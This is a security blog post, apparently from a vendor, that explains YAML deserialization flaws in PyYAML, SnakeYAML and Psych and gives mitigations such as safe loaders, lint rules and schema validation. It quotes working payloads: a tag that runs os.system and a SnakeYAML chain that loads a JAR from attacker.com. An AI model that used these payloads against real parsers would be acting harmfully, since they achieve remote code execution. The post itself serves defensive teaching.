
YAML Deserialization Attacks and How to Prevent Them

YAML looks innocent, but its deserialization features have led to remote code execution in applications across the Python, Java, and Ruby ecosystems. Here is why that happens and how to stay safe.

Alex
Security Architect

YAML is everywhere -- Kubernetes manifests, CI/CD configurations, application settings, Ansible playbooks, Docker Compose files. Developers love it because it is readable. Attackers love it because many YAML parsers can instantiate arbitrary objects during deserialization, turning a configuration file into a remote code execution vector.

The root problem is that YAML was designed as a data serialization format, not just a configuration format. The YAML specification includes features for representing language-specific data types, object references, and custom tags. These features are powerful for serialization but catastrophic for security when applied to untrusted input.

How YAML Deserialization Attacks Work

Python: The yaml.load() Disaster

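In Python, PyYAML's yaml.load() can instantiate arbitrary Python objects whenever it runs with an unsafe loader: Loader=yaml.UnsafeLoader (or the legacy yaml.Loader), or no Loader argument at all on PyYAML versions before 5.1, where the unsafe loader was the default. Since 5.1 the default has been yaml.FullLoader, which blocks the most direct payloads but has been bypassed more than once (for example CVE-2020-14343, fixed in 5.4), and PyYAML 6.0 requires the Loader argument to be passed explicitly. Under an unsafe loader, a YAML document like this: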

!!python/object/apply:os.system ['whoami']

executes the whoami command when parsed. The !!python/object/apply tag tells PyYAML to call os.system with the provided arguments. Any function in any importable Python module can be called this way.

The fix is to always use yaml.safe_load() instead of yaml.load(). This restricts parsing to basic YAML types (strings, numbers, lists, dictionaries) without any object instantiation.
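As a rough illustration of that fix, the sketch below wraps yaml.safe_load() so that a document carrying a Python-specific tag is rejected instead of executed. It assumes PyYAML is installed; the wrapper name load_untrusted_yaml is hypothetical and not part of PyYAML.

```python
import yaml  # PyYAML (third-party package)


def load_untrusted_yaml(text):
    """Parse YAML using only basic types (hypothetical helper, not a PyYAML API).

    yaml.safe_load() has no constructor for python/* tags, so a payload such as
    !!python/object/apply:os.system fails with a YAMLError instead of running.
    """
    try:
        return yaml.safe_load(text)
    except yaml.YAMLError as exc:
        raise ValueError(f"rejected YAML document: {exc}") from exc
```

Called with an ordinary document such as "name: web\nreplicas: 3", the helper returns a plain dictionary. Called with the os.system payload shown earlier, it raises ValueError and no command is run.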

This vulnerability is so common that Bandit (the Python security linter) has a dedicated check for it (B506). Despite years of awareness, new applications continue to ship with unsafe yaml.load() calls.

Java: SnakeYAML Object Instantiation

SnakeYAML, the most popular Java YAML parser, supports arbitrary object construction through YAML tags, and in 1.x releases a plain new Yaml() allows it by default. A document containing:

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker.com/payload.jar"]]]]

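will cause SnakeYAML to instantiate a ScriptEngineManager backed by a URLClassLoader that points at the attacker's JAR. While looking for script engine providers, the ScriptEngineManager loads and instantiates classes from that remote JAR, achieving remote code execution.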

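CVE-2022-1471 was assigned to this behavior in SnakeYAML's default Constructor. SnakeYAML 2.0 changed the default so that new Yaml() no longer instantiates classes from global tags unless the application explicitly allows them. On 1.x, the mitigation is to build the parser with SafeConstructor, which, like Python's safe_load(), restricts parsing to basic types.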

Ruby: Psych and ERB

Ruby's YAML parser, Psych, supports object deserialization through tags. Combined with classes such as Ruby's ERB template engine, this has been exploited to achieve code execution through crafted YAML documents.

Rails applications that deserialize YAML from user input have been particularly vulnerable. CVE-2013-0156 was a critical Rails vulnerability where YAML deserialization in the XML parameter parser led to remote code execution.

Where YAML Deserialization Vulnerabilities Hide

Configuration files from untrusted sources. Applications that load YAML configuration from user-uploaded files, shared repositories, or network locations are vulnerable if they use unsafe parsing.

API endpoints that accept YAML. Some APIs accept YAML as an alternative to JSON. If the API endpoint uses an unsafe YAML parser, every request is a potential RCE vector.

CI/CD configurations. CI/CD systems parse YAML configurations that may be contributed by users with varying trust levels. A malicious contributor can craft a YAML file that exploits the CI/CD system's YAML parser.

Template rendering. Applications that render YAML templates with user-controlled values can be vulnerable if the template output is then parsed with an unsafe loader.
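To make the template-rendering case concrete, here is a minimal sketch comparing string interpolation with serializing a data structure. It assumes PyYAML; the function names, the two-field template, and the PAYLOAD constant are made up for illustration.

```python
import yaml  # PyYAML (third-party package)

# The same tag payload used earlier, here arriving as a user-supplied value.
PAYLOAD = "!!python/object/apply:os.system ['whoami']"


def render_naive(username):
    # String interpolation: the user value is pasted in as raw YAML syntax,
    # so a tag inside it becomes a live tag in the rendered document.
    return f"role: viewer\nuser: {username}\n"


def render_escaped(username):
    # Serializing a data structure lets the emitter quote the value,
    # so it can only ever come back as a plain string.
    return yaml.safe_dump({"role": "viewer", "user": username})
```

With render_naive(PAYLOAD), the rendered document contains a real !!python/object/apply tag: an unsafe loader would act on it, and yaml.safe_load() refuses it with an error. With render_escaped(PAYLOAD), the value is quoted and parses back as an ordinary string.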

Prevention Strategies

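Always use safe loading functions. In Python, use yaml.safe_load(). In Java, SnakeYAML 2.x restricts global tags by default; to limit parsing to basic types explicitly, use new Yaml(new SafeConstructor(new LoaderOptions())), since the no-argument SafeConstructor constructor from 1.x is no longer available. In Ruby, use YAML.safe_load(). This is the single most important mitigation.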

Ban unsafe YAML functions in your codebase. Add linting rules (Bandit B506 for Python, Semgrep rules for other languages) that flag any use of unsafe YAML parsing functions. Make these rules build-breaking, not just warnings.
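For a sense of what such a rule checks, the following is a simplified sketch built on Python's standard ast module. It is not how Bandit or Semgrep are implemented, the function name find_unsafe_yaml_loads is hypothetical, and it only recognizes calls written literally as yaml.<function>(...), so import aliases slip through.

```python
import ast

# Loaders treated as safe in this sketch; anything else is flagged.
SAFE_LOADERS = {"SafeLoader", "CSafeLoader"}
# PyYAML helpers that never use a safe loader.
ALWAYS_UNSAFE = {"unsafe_load", "unsafe_load_all", "full_load", "full_load_all"}
# Functions whose safety depends on the Loader argument.
NEEDS_LOADER = {"load", "load_all"}


def find_unsafe_yaml_loads(source, filename="<string>"):
    """Return sorted line numbers of yaml.* calls that may construct objects."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Only match attribute calls on a name spelled exactly "yaml".
        if not (isinstance(func, ast.Attribute)
                and isinstance(func.value, ast.Name)
                and func.value.id == "yaml"):
            continue
        if func.attr in ALWAYS_UNSAFE:
            findings.append(node.lineno)
        elif func.attr in NEEDS_LOADER:
            # Loader can be passed by keyword or as the second positional argument.
            loader = next((kw.value for kw in node.keywords if kw.arg == "Loader"), None)
            if loader is None and len(node.args) >= 2:
                loader = node.args[1]
            # Handles both yaml.SafeLoader (Attribute) and a bare SafeLoader (Name).
            name = getattr(loader, "attr", None) or getattr(loader, "id", None)
            if name not in SAFE_LOADERS:
                findings.append(node.lineno)
    return sorted(findings)
```

A check like this could run in CI over every Python file and fail the build on any finding. In practice an established tool is the better choice, since it also handles aliases and other call patterns this sketch ignores.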

Treat YAML input as untrusted. Even YAML from internal sources should be parsed safely. Configuration files can be modified by compromised systems or malicious insiders.

Consider alternatives to YAML. For configuration files, TOML offers similar readability without the dangerous serialization features. For data exchange, JSON is simpler and has a smaller attack surface. YAML's complexity is rarely necessary for configuration.

Validate YAML schema after parsing. Even with safe loading, validate that the parsed data matches your expected schema. Reject unexpected keys, types, or structures.
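One way to do that post-parse validation, sketched with only the standard library: the schema below (name, replicas, ports) is invented for illustration, and a real project might prefer a dedicated schema library over hand-written checks.

```python
# Hypothetical schema for illustration: required key -> expected Python type.
EXPECTED_SCHEMA = {"name": str, "replicas": int, "ports": list}


def validate_config(data, schema=EXPECTED_SCHEMA):
    """Check safely parsed YAML data against a flat schema, raising ValueError on mismatch."""
    if not isinstance(data, dict):
        raise ValueError("top-level YAML value must be a mapping")

    unexpected = set(data) - set(schema)
    if unexpected:
        raise ValueError("unexpected keys: " + ", ".join(sorted(repr(k) for k in unexpected)))

    missing = set(schema) - set(data)
    if missing:
        raise ValueError("missing keys: " + ", ".join(sorted(missing)))

    for key, expected_type in schema.items():
        value = data[key]
        # bool is a subclass of int in Python, so reject it explicitly
        # unless the schema really asks for a bool.
        if isinstance(value, bool) and expected_type is not bool:
            raise ValueError(f"{key!r} must be {expected_type.__name__}, got bool")
        if not isinstance(value, expected_type):
            raise ValueError(
                f"{key!r} must be {expected_type.__name__}, got {type(value).__name__}"
            )
    return data
```

The function is meant to run on the result of a safe load, so a document that parses cleanly but carries an extra key or a string where a number is expected is still rejected before the application uses it.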

How Safeguard.sh Helps

Safeguard.sh monitors YAML parsing libraries across your dependency tree. We track vulnerabilities in PyYAML, SnakeYAML, js-yaml, and other YAML parsers, alerting you to critical updates such as the safer defaults introduced in SnakeYAML 2.0. Our platform also identifies applications that depend on vulnerable YAML parser versions, helping you prioritize remediation before attackers exploit these well-known vectors.
